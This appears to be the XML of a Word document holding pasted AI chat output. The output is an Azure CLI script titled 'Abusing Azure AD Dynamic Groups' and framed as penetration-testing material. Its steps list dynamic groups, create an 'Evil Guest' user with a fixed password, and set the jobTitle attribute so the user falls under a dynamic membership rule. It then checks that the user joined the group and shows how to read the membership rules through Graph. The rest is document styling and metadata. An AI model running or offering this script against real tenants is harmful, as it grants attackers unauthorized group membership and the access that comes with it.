    <w:p w14:paraId="5FAD8963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4C4CE9EE">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7C83DE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Would you like a version of this in Bash using Azure CLI instead of PowerShell?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DB9A84" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C37CA4" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc226381640"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure CLI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="33916C61" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CF7A60B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Here is the </w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure CLI version</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the </w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Dynamic Group Abuse</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script for penetration testing use, rewritten for clarity and adapted to CLI syntax.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9E7E8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3DB725C7">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5832AF7B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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DISCLAIMER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B82F9CC" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Use this only in environments you are authorized to test.</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unauthorized use can violate laws and policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB5C11A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363126B9">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BDF2EB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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure CLI Script: Abusing Azure AD Dynamic Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="571CC722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1: Log in to Azure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0610522D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 login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2D2E43" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F5496BB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Optional: Select the right subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B276E54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az account set --subscription "&lt;SUBSCRIPTION_ID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C08A06" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7BC54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2: List all dynamic groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4ADD26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echo "[+] Listing dynamic membership groups..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5512DDC9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 ad group list --query "[?groupTypes[?contains(@, 'DynamicMembership')]].{Name:displayName, ID:id}" -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD33FD6" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7644CA15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3: Invite a new guest user (use real email)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4809838F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echo "[+] Inviting guest user..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3008EF93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 ad user create --display-name "Evil Guest" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBA015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--user-principal-name evilguest@yourtenant.onmicrosoft.com \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419942FC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--password "TempPassword123!" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB92F7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--force-change-password-next-login false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6431EA44" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F5190E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NOTE: You may need to invite external users via MS Graph or portal for full guest features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACF0C91" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742218C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4: Set the guest user's secondary email (not directly possible in az CLI, use Graph API or preview SDK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1C642D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Instead, you can update attributes like jobTitle or department that match dynamic rules:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3BF7E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echo "[+] Updating guest user attributes to match dynamic rule..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A12AEE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 ad user update --id evilguest@yourtenant.onmicrosoft.com --set jobTitle="Contractor"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF8F5A8" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CF4F7FD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5: Wait for membership sync</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA631A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echo "[+] Waiting for dynamic group engine to process membership (2-5 mins)..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7118AD24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sleep 180</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB72FF8" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40B81A8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Step 6: Verify if guest user is in the dynamic group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DE9A49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# Replace &lt;GROUP_ID&gt; with the dynamic group’s Object ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D1DC4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GROUP_ID="&lt;REPLACE_WITH_DYNAMIC_GROUP_ID&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FC7014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echo "[+] Checking if guest is a member of the group..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03647268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lastRenderedPageBreak/>
        <w:t>az ad group member list --group "$GROUP_ID" --query "[?userPrincipalName=='evilguest@yourtenant.onmicrosoft.com']" -o table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F85A9AB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16A76279">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CACD35" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>How to Find Dynamic Group Rules (if needed via Graph):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F13B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Azure CLI doesn't expose membershipRule directly. You can use Microsoft Graph API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391331F0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>az rest --method GET \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306F865A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--uri "https://graph.microsoft.com/beta/groups?$filter=groupTypes/any(c:c eq 'DynamicMembership')" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4181ED15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  --headers 'Content-Type=application/json'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307115EC" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="2E797893">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62C9A9" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRPr="0099552A" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Would you like a </w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Graph API automation script</w:t>
      </w:r>
      <w:r w:rsidRPr="0099552A">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., in Python or Bash with curl) for full control over attributes like OtherMails or membershipRule?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DF4ACF" w14:textId="77777777" w:rsidR="005F4FD4" w:rsidRDefault="005F4FD4" w:rsidP="005F4FD4">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3123C90C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6536"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D5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56599"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F7A2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1276A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="730A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3104"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="69C4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74724A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8658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00583">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1482306014">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="742213891">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="434055595">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2103526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FD4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178AD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5F4FD4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6772"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6B917075-E215-40AF-8581-AE600D62F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FD4"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Aptos"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22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78AD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"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178AD"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"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FD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FD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FD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FD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FD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8AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Aptos" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Aptos" w:cstheme="majorBidi"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178AD"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI" w:cstheme="majorBidi"/>
      <w:bCs/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
      <w:lang w:eastAsia="en-I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FD4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FD4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FD4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FD4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FD4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FD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FD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5F4F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FD4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5F4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FD4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5F4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952</Words>
  <Characters>5432</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>45</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop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2026-04-06T12:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-06T12:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>